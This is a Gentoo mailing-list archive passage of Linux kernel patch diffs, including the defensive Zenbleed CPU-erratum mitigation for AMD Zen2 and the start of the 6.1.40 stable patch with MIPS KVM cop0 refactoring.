++++ b/arch/x86/include/asm/microcode_amd.h
+@@ -48,11 +48,13 @@ extern void __init load_ucode_amd_bsp(unsigned int family);
+ extern void load_ucode_amd_ap(unsigned int family);
+ extern int __init save_microcode_in_initrd_amd(unsigned int family);
+ void reload_ucode_amd(unsigned int cpu);
++extern void amd_check_microcode(void);
+ #else
+ static inline void __init load_ucode_amd_bsp(unsigned int family) {}
+ static inline void load_ucode_amd_ap(unsigned int family) {}
+ static inline int __init
+ save_microcode_in_initrd_amd(unsigned int family) { return -EINVAL; }
+ static inline void reload_ucode_amd(unsigned int cpu) {}
++static inline void amd_check_microcode(void) {}
+ #endif
+ #endif /* _ASM_X86_MICROCODE_AMD_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 117e4e977b55d..846067e1ee8bb 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -543,6 +543,7 @@
+ #define MSR_AMD64_DE_CFG		0xc0011029
+ #define MSR_AMD64_DE_CFG_LFENCE_SERIALIZE_BIT	 1
+ #define MSR_AMD64_DE_CFG_LFENCE_SERIALIZE	BIT_ULL(MSR_AMD64_DE_CFG_LFENCE_SERIALIZE_BIT)
++#define MSR_AMD64_DE_CFG_ZEN2_FP_BACKUP_FIX_BIT 9
+ 
+ #define MSR_AMD64_BU_CFG2		0xc001102a
+ #define MSR_AMD64_IBSFETCHCTL		0xc0011030
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index d2dbbc50b3a7b..7f4eb8b027cc8 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -27,11 +27,6 @@
+ 
+ #include "cpu.h"
+ 
+-static const int amd_erratum_383[];
+-static const int amd_erratum_400[];
+-static const int amd_erratum_1054[];
+-static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum);
+-
+ /*
+  * nodes_per_socket: Stores the number of nodes per socket.
+  * Refer to Fam15h Models 00-0fh BKDG - CPUID Fn8000_001E_ECX
+@@ -39,6 +34,78 @@ static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum);
+  */
+ static u32 nodes_per_socket = 1;
+ 
++/*
++ * AMD errata checking
++ *
++ * Errata are defined as arrays of ints using the AMD_LEGACY_ERRATUM() or
++ * AMD_OSVW_ERRATUM() macros. The latter is intended for newer errata that
++ * have an OSVW id assigned, which it takes as first argument. Both take a
++ * variable number of family-specific model-stepping ranges created by
++ * AMD_MODEL_RANGE().
++ *
++ * Example:
++ *
++ * const int amd_erratum_319[] =
++ *	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x10, 0x2, 0x1, 0x4, 0x2),
++ *			   AMD_MODEL_RANGE(0x10, 0x8, 0x0, 0x8, 0x0),
++ *			   AMD_MODEL_RANGE(0x10, 0x9, 0x0, 0x9, 0x0));
++ */
++
++#define AMD_LEGACY_ERRATUM(...)		{ -1, __VA_ARGS__, 0 }
++#define AMD_OSVW_ERRATUM(osvw_id, ...)	{ osvw_id, __VA_ARGS__, 0 }
++#define AMD_MODEL_RANGE(f, m_start, s_start, m_end, s_end) \
++	((f << 24) | (m_start << 16) | (s_start << 12) | (m_end << 4) | (s_end))
++#define AMD_MODEL_RANGE_FAMILY(range)	(((range) >> 24) & 0xff)
++#define AMD_MODEL_RANGE_START(range)	(((range) >> 12) & 0xfff)
++#define AMD_MODEL_RANGE_END(range)	((range) & 0xfff)
++
++static const int amd_erratum_400[] =
++	AMD_OSVW_ERRATUM(1, AMD_MODEL_RANGE(0xf, 0x41, 0x2, 0xff, 0xf),
++			    AMD_MODEL_RANGE(0x10, 0x2, 0x1, 0xff, 0xf));
++
++static const int amd_erratum_383[] =
++	AMD_OSVW_ERRATUM(3, AMD_MODEL_RANGE(0x10, 0, 0, 0xff, 0xf));
++
++/* #1054: Instructions Retired Performance Counter May Be Inaccurate */
++static const int amd_erratum_1054[] =
++	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0, 0, 0x2f, 0xf));
++
++static const int amd_zenbleed[] =
++	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0x30, 0x0, 0x4f, 0xf),
++			   AMD_MODEL_RANGE(0x17, 0x60, 0x0, 0x7f, 0xf),
++			   AMD_MODEL_RANGE(0x17, 0xa0, 0x0, 0xaf, 0xf));
++
++static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum)
++{
++	int osvw_id = *erratum++;
++	u32 range;
++	u32 ms;
++
++	if (osvw_id >= 0 && osvw_id < 65536 &&
++	    cpu_has(cpu, X86_FEATURE_OSVW)) {
++		u64 osvw_len;
++
++		rdmsrl(MSR_AMD64_OSVW_ID_LENGTH, osvw_len);
++		if (osvw_id < osvw_len) {
++			u64 osvw_bits;
++
++			rdmsrl(MSR_AMD64_OSVW_STATUS + (osvw_id >> 6),
++			    osvw_bits);
++			return osvw_bits & (1ULL << (osvw_id & 0x3f));
++		}
++	}
++
++	/* OSVW unavailable or ID unknown, match family-model-stepping range */
++	ms = (cpu->x86_model << 4) | cpu->x86_stepping;
++	while ((range = *erratum++))
++		if ((cpu->x86 == AMD_MODEL_RANGE_FAMILY(range)) &&
++		    (ms >= AMD_MODEL_RANGE_START(range)) &&
++		    (ms <= AMD_MODEL_RANGE_END(range)))
++			return true;
++
++	return false;
++}
++
+ static inline int rdmsrl_amd_safe(unsigned msr, unsigned long long *p)
+ {
+ 	u32 gprs[8] = { 0 };
+@@ -916,6 +983,47 @@ static void init_amd_zn(struct cpuinfo_x86 *c)
+ 	}
+ }
+ 
++static bool cpu_has_zenbleed_microcode(void)
++{
++	u32 good_rev = 0;
++
++	switch (boot_cpu_data.x86_model) {
++	case 0x30 ... 0x3f: good_rev = 0x0830107a; break;
++	case 0x60 ... 0x67: good_rev = 0x0860010b; break;
++	case 0x68 ... 0x6f: good_rev = 0x08608105; break;
++	case 0x70 ... 0x7f: good_rev = 0x08701032; break;
++	case 0xa0 ... 0xaf: good_rev = 0x08a00008; break;
++
++	default:
++		return false;
++		break;
++	}
++
++	if (boot_cpu_data.microcode < good_rev)
++		return false;
++
++	return true;
++}
++
++static void zenbleed_check(struct cpuinfo_x86 *c)
++{
++	if (!cpu_has_amd_erratum(c, amd_zenbleed))
++		return;
++
++	if (cpu_has(c, X86_FEATURE_HYPERVISOR))
++		return;
++
++	if (!cpu_has(c, X86_FEATURE_AVX))
++		return;
++
++	if (!cpu_has_zenbleed_microcode()) {
++		pr_notice_once("Zenbleed: please update your microcode for the most optimal fix\n");
++		msr_set_bit(MSR_AMD64_DE_CFG, MSR_AMD64_DE_CFG_ZEN2_FP_BACKUP_FIX_BIT);
++	} else {
++		msr_clear_bit(MSR_AMD64_DE_CFG, MSR_AMD64_DE_CFG_ZEN2_FP_BACKUP_FIX_BIT);
++	}
++}
++
+ static void init_amd(struct cpuinfo_x86 *c)
+ {
+ 	early_init_amd(c);
+@@ -1005,6 +1113,8 @@ static void init_amd(struct cpuinfo_x86 *c)
+ 		msr_set_bit(MSR_K7_HWCR, MSR_K7_HWCR_IRPERF_EN_BIT);
+ 
+ 	check_null_seg_clears_base(c);
++
++	zenbleed_check(c);
+ }
+ 
+ #ifdef CONFIG_X86_32
+@@ -1100,73 +1210,6 @@ static const struct cpu_dev amd_cpu_dev = {
+ 
+ cpu_dev_register(amd_cpu_dev);
+ 
+-/*
+- * AMD errata checking
+- *
+- * Errata are defined as arrays of ints using the AMD_LEGACY_ERRATUM() or
+- * AMD_OSVW_ERRATUM() macros. The latter is intended for newer errata that
+- * have an OSVW id assigned, which it takes as first argument. Both take a
+- * variable number of family-specific model-stepping ranges created by
+- * AMD_MODEL_RANGE().
+- *
+- * Example:
+- *
+- * const int amd_erratum_319[] =
+- *	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x10, 0x2, 0x1, 0x4, 0x2),
+- *			   AMD_MODEL_RANGE(0x10, 0x8, 0x0, 0x8, 0x0),
+- *			   AMD_MODEL_RANGE(0x10, 0x9, 0x0, 0x9, 0x0));
+- */
+-
+-#define AMD_LEGACY_ERRATUM(...)		{ -1, __VA_ARGS__, 0 }
+-#define AMD_OSVW_ERRATUM(osvw_id, ...)	{ osvw_id, __VA_ARGS__, 0 }
+-#define AMD_MODEL_RANGE(f, m_start, s_start, m_end, s_end) \
+-	((f << 24) | (m_start << 16) | (s_start << 12) | (m_end << 4) | (s_end))
+-#define AMD_MODEL_RANGE_FAMILY(range)	(((range) >> 24) & 0xff)
+-#define AMD_MODEL_RANGE_START(range)	(((range) >> 12) & 0xfff)
+-#define AMD_MODEL_RANGE_END(range)	((range) & 0xfff)
+-
+-static const int amd_erratum_400[] =
+-	AMD_OSVW_ERRATUM(1, AMD_MODEL_RANGE(0xf, 0x41, 0x2, 0xff, 0xf),
+-			    AMD_MODEL_RANGE(0x10, 0x2, 0x1, 0xff, 0xf));
+-
+-static const int amd_erratum_383[] =
+-	AMD_OSVW_ERRATUM(3, AMD_MODEL_RANGE(0x10, 0, 0, 0xff, 0xf));
+-
+-/* #1054: Instructions Retired Performance Counter May Be Inaccurate */
+-static const int amd_erratum_1054[] =
+-	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0, 0, 0x2f, 0xf));
+-
+-static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum)
+-{
+-	int osvw_id = *erratum++;
+-	u32 range;
+-	u32 ms;
+-
+-	if (osvw_id >= 0 && osvw_id < 65536 &&
+-	    cpu_has(cpu, X86_FEATURE_OSVW)) {
+-		u64 osvw_len;
+-
+-		rdmsrl(MSR_AMD64_OSVW_ID_LENGTH, osvw_len);
+-		if (osvw_id < osvw_len) {
+-			u64 osvw_bits;
+-
+-			rdmsrl(MSR_AMD64_OSVW_STATUS + (osvw_id >> 6),
+-			    osvw_bits);
+-			return osvw_bits & (1ULL << (osvw_id & 0x3f));
+-		}
+-	}
+-
+-	/* OSVW unavailable or ID unknown, match family-model-stepping range */
+-	ms = (cpu->x86_model << 4) | cpu->x86_stepping;
+-	while ((range = *erratum++))
+-		if ((cpu->x86 == AMD_MODEL_RANGE_FAMILY(range)) &&
+-		    (ms >= AMD_MODEL_RANGE_START(range)) &&
+-		    (ms <= AMD_MODEL_RANGE_END(range)))
+-			return true;
+-
+-	return false;
+-}
+-
+ void set_dr_addr_mask(unsigned long mask, int dr)
+ {
+ 	if (!boot_cpu_has(X86_FEATURE_BPEXT))
+@@ -1201,3 +1244,15 @@ u32 amd_get_highest_perf(void)
+ 	return 255;
+ }
+ EXPORT_SYMBOL_GPL(amd_get_highest_perf);
++
++static void zenbleed_check_cpu(void *unused)
++{
++	struct cpuinfo_x86 *c = &cpu_data(smp_processor_id());
++
++	zenbleed_check(c);
++}
++
++void amd_check_microcode(void)
++{
++	on_each_cpu(zenbleed_check_cpu, NULL, 1);
++}
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index c34bdba57993a..d298d70f74ce6 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -2346,6 +2346,8 @@ void microcode_check(struct cpuinfo_x86 *prev_info)
+ 
+ 	perf_check_microcode();
+ 
++	amd_check_microcode();
++
+ 	store_cpu_caps(&curr_info);
+ 
+ 	if (!memcmp(&prev_info->x86_capability, &curr_info.x86_capability,


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-07-23 15:14 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-07-23 15:14 UTC (permalink / raw
  To: gentoo-commits

commit:     53c2915984a59cdacbcb0e26a996e019d57ff320
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Jul 23 15:13:54 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Jul 23 15:14:13 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=53c29159

Linux patch 6.1.40

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    8 +
 1039_linux-6.1.40.patch | 8445 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 8453 insertions(+)

diff --git a/0000_README b/0000_README
index 3b5aa81d..e1e77420 100644
--- a/0000_README
+++ b/0000_README
@@ -195,6 +195,14 @@ Patch:  1037_linux-6.1.38.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.38
 
+Patch:  1038_linux-6.1.39.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.39
+
+Patch:  1039_linux-6.1.40.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.40
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1039_linux-6.1.40.patch b/1039_linux-6.1.40.patch
new file mode 100644
index 00000000..c1c19f92
--- /dev/null
+++ b/1039_linux-6.1.40.patch
@@ -0,0 +1,8445 @@
+diff --git a/Documentation/admin-guide/device-mapper/dm-init.rst b/Documentation/admin-guide/device-mapper/dm-init.rst
+index e5242ff17e9b7..981d6a9076994 100644
+--- a/Documentation/admin-guide/device-mapper/dm-init.rst
++++ b/Documentation/admin-guide/device-mapper/dm-init.rst
+@@ -123,3 +123,11 @@ Other examples (per target):
+     0 1638400 verity 1 8:1 8:2 4096 4096 204800 1 sha256
+     fb1a5a0f00deb908d8b53cb270858975e76cf64105d412ce764225d53b8f3cfd
+     51934789604d1b92399c52e7cb149d1b3a1b74bbbcb103b2a0aaacbed5c08584
++
++For setups using device-mapper on top of asynchronously probed block
++devices (MMC, USB, ..), it may be necessary to tell dm-init to
++explicitly wait for them to become available before setting up the
++device-mapper tables. This can be done with the "dm-mod.waitfor="
++module parameter, which takes a list of devices to wait for::
++
++  dm-mod.waitfor=<device1>[,..,<deviceN>]
+diff --git a/Makefile b/Makefile
+index f0619754c29a5..2bb0c01391a98 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 39
++SUBLEVEL = 40
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/mips/include/asm/kvm_host.h b/arch/mips/include/asm/kvm_host.h
+index 5cedb28e8a408..8042a87b8511f 100644
+--- a/arch/mips/include/asm/kvm_host.h
++++ b/arch/mips/include/asm/kvm_host.h
+@@ -317,7 +317,7 @@ struct kvm_vcpu_arch {
+ 	unsigned int aux_inuse;
+ 
+ 	/* COP0 State */
+-	struct mips_coproc *cop0;
++	struct mips_coproc cop0;
+ 
+ 	/* Resume PC after MMIO completion */
+ 	unsigned long io_pc;
+@@ -698,7 +698,7 @@ static inline bool kvm_mips_guest_can_have_fpu(struct kvm_vcpu_arch *vcpu)
+ static inline bool kvm_mips_guest_has_fpu(struct kvm_vcpu_arch *vcpu)
+ {
+ 	return kvm_mips_guest_can_have_fpu(vcpu) &&
+-		kvm_read_c0_guest_config1(vcpu->cop0) & MIPS_CONF1_FP;
++		kvm_read_c0_guest_config1(&vcpu->cop0) & MIPS_CONF1_FP;
+ }
+ 
+ static inline bool kvm_mips_guest_can_have_msa(struct kvm_vcpu_arch *vcpu)
+@@ -710,7 +710,7 @@ static inline bool kvm_mips_guest_can_have_msa(struct kvm_vcpu_arch *vcpu)
+ static inline bool kvm_mips_guest_has_msa(struct kvm_vcpu_arch *vcpu)
+ {
+ 	return kvm_mips_guest_can_have_msa(vcpu) &&
+-		kvm_read_c0_guest_config3(vcpu->cop0) & MIPS_CONF3_MSA;
++		kvm_read_c0_guest_config3(&vcpu->cop0) & MIPS_CONF3_MSA;
+ }
+ 
+ struct kvm_mips_callbacks {
+diff --git a/arch/mips/kernel/cpu-probe.c b/arch/mips/kernel/cpu-probe.c
+index 6f5d825958778..482af80b81790 100644
+--- a/arch/mips/kernel/cpu-probe.c
++++ b/arch/mips/kernel/cpu-probe.c
+@@ -1675,7 +1675,10 @@ static inline void decode_cpucfg(struct cpuinfo_mips *c)
+ 
+ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ {
++	c->cputype = CPU_LOONGSON64;
++
+ 	/* All Loongson processors covered here define ExcCode 16 as GSExc. */
++	decode_configs(c);
+ 	c->options |= MIPS_CPU_GSEXCEX;
+ 
+ 	switch (c->processor_id & PRID_IMP_MASK) {
+@@ -1685,7 +1688,6 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		case PRID_REV_LOONGSON2K_R1_1:
+ 		case PRID_REV_LOONGSON2K_R1_2:
+ 		case PRID_REV_LOONGSON2K_R1_3:
+-			c->cputype = CPU_LOONGSON64;
+ 			__cpu_name[cpu] = "Loongson-2K";
+ 			set_elf_platform(cpu, "gs264e");
+ 			set_isa(c, MIPS_CPU_ISA_M64R2);
+@@ -1698,14 +1700,12 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		switch (c->processor_id & PRID_REV_MASK) {
+ 		case PRID_REV_LOONGSON3A_R2_0:
+ 		case PRID_REV_LOONGSON3A_R2_1:
+-			c->cputype = CPU_LOONGSON64;
+ 			__cpu_name[cpu] = "ICT Loongson-3";
+ 			set_elf_platform(cpu, "loongson3a");
+ 			set_isa(c, MIPS_CPU_ISA_M64R2);
+ 			break;
+ 		case PRID_REV_LOONGSON3A_R3_0:
+ 		case PRID_REV_LOONGSON3A_R3_1:
+-			c->cputype = CPU_LOONGSON64;
+ 			__cpu_name[cpu] = "ICT Loongson-3";
+ 			set_elf_platform(cpu, "loongson3a");
+ 			set_isa(c, MIPS_CPU_ISA_M64R2);
+@@ -1725,7 +1725,6 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		c->ases &= ~MIPS_ASE_VZ; /* VZ of Loongson-3A2000/3000 is incomplete */
+ 		break;
+ 	case PRID_IMP_LOONGSON_64G:
+-		c->cputype = CPU_LOONGSON64;
+ 		__cpu_name[cpu] = "ICT Loongson-3";
+ 		set_elf_platform(cpu, "loongson3a");
+ 		set_isa(c, MIPS_CPU_ISA_M64R2);
+@@ -1735,8 +1734,6 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		panic("Unknown Loongson Processor ID!");
+ 		break;
+ 	}
+-
+-	decode_configs(c);
+ }
+ #else
+ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu) { }
+diff --git a/arch/mips/kvm/emulate.c b/arch/mips/kvm/emulate.c
+index edaec93a1a1fe..e64372b8f66af 100644
+--- a/arch/mips/kvm/emulate.c
++++ b/arch/mips/kvm/emulate.c
+@@ -312,7 +312,7 @@ int kvm_get_badinstrp(u32 *opc, struct kvm_vcpu *vcpu, u32 *out)
+  */
+ int kvm_mips_count_disabled(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	return	(vcpu->arch.count_ctl & KVM_REG_MIPS_COUNT_CTL_DC) ||
+ 		(kvm_read_c0_guest_cause(cop0) & CAUSEF_DC);
+@@ -384,7 +384,7 @@ static inline ktime_t kvm_mips_count_time(struct kvm_vcpu *vcpu)
+  */
+ static u32 kvm_mips_read_count_running(struct kvm_vcpu *vcpu, ktime_t now)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	ktime_t expires, threshold;
+ 	u32 count, compare;
+ 	int running;
+@@ -444,7 +444,7 @@ static u32 kvm_mips_read_count_running(struct kvm_vcpu *vcpu, ktime_t now)
+  */
+ u32 kvm_mips_read_count(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	/* If count disabled just read static copy of count */
+ 	if (kvm_mips_count_disabled(vcpu))
+@@ -502,7 +502,7 @@ ktime_t kvm_mips_freeze_hrtimer(struct kvm_vcpu *vcpu, u32 *count)
+ static void kvm_mips_resume_hrtimer(struct kvm_vcpu *vcpu,
+ 				    ktime_t now, u32 count)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 compare;
+ 	u64 delta;
+ 	ktime_t expire;
+@@ -603,7 +603,7 @@ resume:
+  */
+ void kvm_mips_write_count(struct kvm_vcpu *vcpu, u32 count)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	ktime_t now;
+ 
+ 	/* Calculate bias */
+@@ -649,7 +649,7 @@ void kvm_mips_init_count(struct kvm_vcpu *vcpu, unsigned long count_hz)
+  */
+ int kvm_mips_set_count_hz(struct kvm_vcpu *vcpu, s64 count_hz)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	int dc;
+ 	ktime_t now;
+ 	u32 count;
+@@ -696,7 +696,7 @@ int kvm_mips_set_count_hz(struct kvm_vcpu *vcpu, s64 count_hz)
+  */
+ void kvm_mips_write_compare(struct kvm_vcpu *vcpu, u32 compare, bool ack)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	int dc;
+ 	u32 old_compare = kvm_read_c0_guest_compare(cop0);
+ 	s32 delta = compare - old_compare;
+@@ -779,7 +779,7 @@ void kvm_mips_write_compare(struct kvm_vcpu *vcpu, u32 compare, bool ack)
+  */
+ static ktime_t kvm_mips_count_disable(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 count;
+ 	ktime_t now;
+ 
+@@ -806,7 +806,7 @@ static ktime_t kvm_mips_count_disable(struct kvm_vcpu *vcpu)
+  */
+ void kvm_mips_count_disable_cause(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	kvm_set_c0_guest_cause(cop0, CAUSEF_DC);
+ 	if (!(vcpu->arch.count_ctl & KVM_REG_MIPS_COUNT_CTL_DC))
+@@ -826,7 +826,7 @@ void kvm_mips_count_disable_cause(struct kvm_vcpu *vcpu)
+  */
+ void kvm_mips_count_enable_cause(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 count;
+ 
+ 	kvm_clear_c0_guest_cause(cop0, CAUSEF_DC);
+@@ -852,7 +852,7 @@ void kvm_mips_count_enable_cause(struct kvm_vcpu *vcpu)
+  */
+ int kvm_mips_set_count_ctl(struct kvm_vcpu *vcpu, s64 count_ctl)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	s64 changed = count_ctl ^ vcpu->arch.count_ctl;
+ 	s64 delta;
+ 	ktime_t expire, now;
+diff --git a/arch/mips/kvm/mips.c b/arch/mips/kvm/mips.c
+index a25e0b73ee704..a4f4407b0a332 100644
+--- a/arch/mips/kvm/mips.c
++++ b/arch/mips/kvm/mips.c
+@@ -659,7 +659,7 @@ static int kvm_mips_copy_reg_indices(struct kvm_vcpu *vcpu, u64 __user *indices)
+ static int kvm_mips_get_reg(struct kvm_vcpu *vcpu,
+ 			    const struct kvm_one_reg *reg)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	struct mips_fpu_struct *fpu = &vcpu->arch.fpu;
+ 	int ret;
+ 	s64 v;
+@@ -771,7 +771,7 @@ static int kvm_mips_get_reg(struct kvm_vcpu *vcpu,
+ static int kvm_mips_set_reg(struct kvm_vcpu *vcpu,
+ 			    const struct kvm_one_reg *reg)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	struct mips_fpu_struct *fpu = &vcpu->arch.fpu;
+ 	s64 v;
+ 	s64 vs[2];
+@@ -1111,7 +1111,7 @@ int kvm_vm_ioctl_check_extension(struct kvm *kvm, long ext)
+ int kvm_cpu_has_pending_timer(struct kvm_vcpu *vcpu)
+ {
+ 	return kvm_mips_pending_timer(vcpu) ||
+-		kvm_read_c0_guest_cause(vcpu->arch.cop0) & C_TI;
++		kvm_read_c0_guest_cause(&vcpu->arch.cop0) & C_TI;
+ }
+ 
+ int kvm_arch_vcpu_dump_regs(struct kvm_vcpu *vcpu)
+@@ -1135,7 +1135,7 @@ int kvm_arch_vcpu_dump_regs(struct kvm_vcpu *vcpu)
+ 	kvm_debug("\thi: 0x%08lx\n", vcpu->arch.hi);
+ 	kvm_debug("\tlo: 0x%08lx\n", vcpu->arch.lo);
+ 
+-	cop0 = vcpu->arch.cop0;
++	cop0 = &vcpu->arch.cop0;
+ 	kvm_debug("\tStatus: 0x%08x, Cause: 0x%08x\n",
+ 		  kvm_read_c0_guest_status(cop0),
+ 		  kvm_read_c0_guest_cause(cop0));
+@@ -1257,7 +1257,7 @@ static int __kvm_mips_handle_exit(struct kvm_vcpu *vcpu)
+ 
+ 	case EXCCODE_TLBS:
+ 		kvm_debug("TLB ST fault:  cause %#x, status %#x, PC: %p, BadVaddr: %#lx\n",
+-			  cause, kvm_read_c0_guest_status(vcpu->arch.cop0), opc,
++			  cause, kvm_read_c0_guest_status(&vcpu->arch.cop0), opc,
+ 			  badvaddr);
+ 
+ 		++vcpu->stat.tlbmiss_st_exits;
+@@ -1329,7 +1329,7 @@ static int __kvm_mips_handle_exit(struct kvm_vcpu *vcpu)
+ 		kvm_get_badinstr(opc, vcpu, &inst);
+ 		kvm_err("Exception Code: %d, not yet handled, @ PC: %p, inst: 0x%08x  BadVaddr: %#lx Status: %#x\n",
+ 			exccode, opc, inst, badvaddr,
+-			kvm_read_c0_guest_status(vcpu->arch.cop0));
++			kvm_read_c0_guest_status(&vcpu->arch.cop0));
+ 		kvm_arch_vcpu_dump_regs(vcpu);
+ 		run->exit_reason = KVM_EXIT_INTERNAL_ERROR;
+ 		ret = RESUME_HOST;
+@@ -1402,7 +1402,7 @@ int noinstr kvm_mips_handle_exit(struct kvm_vcpu *vcpu)
+ /* Enable FPU for guest and restore context */
+ void kvm_own_fpu(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned int sr, cfg5;
+ 
+ 	preempt_disable();
+@@ -1446,7 +1446,7 @@ void kvm_own_fpu(struct kvm_vcpu *vcpu)
+ /* Enable MSA for guest and restore context */
+ void kvm_own_msa(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned int sr, cfg5;
+ 
+ 	preempt_disable();
+diff --git a/arch/mips/kvm/stats.c b/arch/mips/kvm/stats.c
+index 53f851a615542..3e6682018fbe6 100644
+--- a/arch/mips/kvm/stats.c
++++ b/arch/mips/kvm/stats.c
+@@ -54,9 +54,9 @@ void kvm_mips_dump_stats(struct kvm_vcpu *vcpu)
+ 	kvm_info("\nKVM VCPU[%d] COP0 Access Profile:\n", vcpu->vcpu_id);
+ 	for (i = 0; i < N_MIPS_COPROC_REGS; i++) {
+ 		for (j = 0; j < N_MIPS_COPROC_SEL; j++) {
+-			if (vcpu->arch.cop0->stat[i][j])
++			if (vcpu->arch.cop0.stat[i][j])
+ 				kvm_info("%s[%d]: %lu\n", kvm_cop0_str[i], j,
+-					 vcpu->arch.cop0->stat[i][j]);
++					 vcpu->arch.cop0.stat[i][j]);
+ 		}
+ 	}
+ #endif
+diff --git a/arch/mips/kvm/trace.h b/arch/mips/kvm/trace.h
+index a8c7fd7bf6d26..136c3535a1cbb 100644
+--- a/arch/mips/kvm/trace.h
++++ b/arch/mips/kvm/trace.h
+@@ -322,11 +322,11 @@ TRACE_EVENT_FN(kvm_guest_mode_change,
+ 	    ),
+ 
+ 	    TP_fast_assign(
+-			__entry->epc = kvm_read_c0_guest_epc(vcpu->arch.cop0);
++			__entry->epc = kvm_read_c0_guest_epc(&vcpu->arch.cop0);
+ 			__entry->pc = vcpu->arch.pc;
+-			__entry->badvaddr = kvm_read_c0_guest_badvaddr(vcpu->arch.cop0);
+-			__entry->status = kvm_read_c0_guest_status(vcpu->arch.cop0);
+-			__entry->cause = kvm_read_c0_guest_cause(vcpu->arch.cop0);
++			__entry->badvaddr = kvm_read_c0_guest_badvaddr(&vcpu->arch.cop0);
++			__entry->status = kvm_read_c0_guest_status(&vcpu->arch.cop0);
++			__entry->cause = kvm_read_c0_guest_cause(&vcpu->arch.cop0);
+ 	    ),
+ 
+ 	    TP_printk("EPC: 0x%08lx PC: 0x%08lx Status: 0x%08x Cause: 0x%08x BadVAddr: 0x%08lx",
+diff --git a/arch/mips/kvm/vz.c b/arch/mips/kvm/vz.c
+index c706f5890a05c..c8f7d793bc633 100644
+--- a/arch/mips/kvm/vz.c
++++ b/arch/mips/kvm/vz.c
